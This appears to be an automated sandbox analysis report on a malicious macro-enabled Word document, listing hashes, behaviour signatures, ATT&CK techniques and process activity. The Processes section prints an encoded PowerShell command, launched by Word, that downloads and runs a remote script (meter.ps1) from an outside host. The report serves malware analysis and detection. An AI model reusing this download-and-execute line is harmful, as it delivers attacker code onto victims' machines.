Analysis

  • max time kernel
    101s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-06-2023 10:17

General

  • Target

    bcdf20e65445ed6bda794d958025e417.docm

  • Size

    16KB

  • MD5

    bcdf20e65445ed6bda794d958025e417

  • SHA1

    6f3f1523627525c8efbb5bfe3e2f612d96801bef

  • SHA256

    332221ec47c7a4dd0296890e05e5c6647993dd1efdb139151e914e7cf22f9e65

  • SHA512

    9769842c9899b9ed2804a4390c40484908813035ca47f7b7ed6a7021337a91701b9daf9efb6ff94730d0b91f45fdd53631b3ac16e5cf1525008bedcfb5ac6210

  • SSDEEP

    384:/iutorSBqsqFxtJsUvWNxt/ZtNNkvJWObKo1nldRN:/XsUyFDJsUv8xllNkvPbKo1fD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.45.161:8081/meter.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bcdf20e65445ed6bda794d958025e417.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEANgAxADoAOAAwADgAMQAvAG0AZQB0AGUAcgAuAHAAcwAxACcAKQAgAHwAIABJAEUAWAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEANgAxADoAOAAwADgAMQAvAG0AZQB0AGUAcgAuAHAAcwAxACcAKQAgAHwAIABJAEUAWAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1480

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    aa8efa56e1e40374bbd21e0e469dceb7

    SHA1

    33a592799d4898c6efdd29e132f2f76ec51dbc08

    SHA256

    25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

    SHA512

    ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_keygobqy.po2.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1036-139-0x00007FFE7F730000-0x00007FFE7F740000-memory.dmp
    Filesize

    64KB

  • memory/1036-137-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-138-0x00007FFE7F730000-0x00007FFE7F740000-memory.dmp
    Filesize

    64KB

  • memory/1036-133-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-225-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-136-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-224-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-223-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-222-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-135-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1036-134-0x00007FFE81F90000-0x00007FFE81FA0000-memory.dmp
    Filesize

    64KB

  • memory/1480-194-0x00000195399D0000-0x00000195399E0000-memory.dmp
    Filesize

    64KB

  • memory/1480-193-0x00000195399D0000-0x00000195399E0000-memory.dmp
    Filesize

    64KB

  • memory/1480-196-0x00000195399D0000-0x00000195399E0000-memory.dmp
    Filesize

    64KB

  • memory/1480-182-0x00000195399D0000-0x00000195399E0000-memory.dmp
    Filesize

    64KB

  • memory/1480-184-0x00000195399D0000-0x00000195399E0000-memory.dmp
    Filesize

    64KB

  • memory/1480-166-0x0000019539AE0000-0x0000019539B02000-memory.dmp
    Filesize

    136KB

  • memory/2620-192-0x0000020B2B780000-0x0000020B2B790000-memory.dmp
    Filesize

    64KB

  • memory/2620-195-0x0000020B2B780000-0x0000020B2B790000-memory.dmp
    Filesize

    64KB

  • memory/2620-191-0x0000020B2B780000-0x0000020B2B790000-memory.dmp
    Filesize

    64KB

  • memory/2620-183-0x0000020B2B780000-0x0000020B2B790000-memory.dmp
    Filesize

    64KB

  • memory/2620-181-0x0000020B2B780000-0x0000020B2B790000-memory.dmp
    Filesize

    64KB

  • memory/2620-180-0x0000020B2B780000-0x0000020B2B790000-memory.dmp
    Filesize

    64KB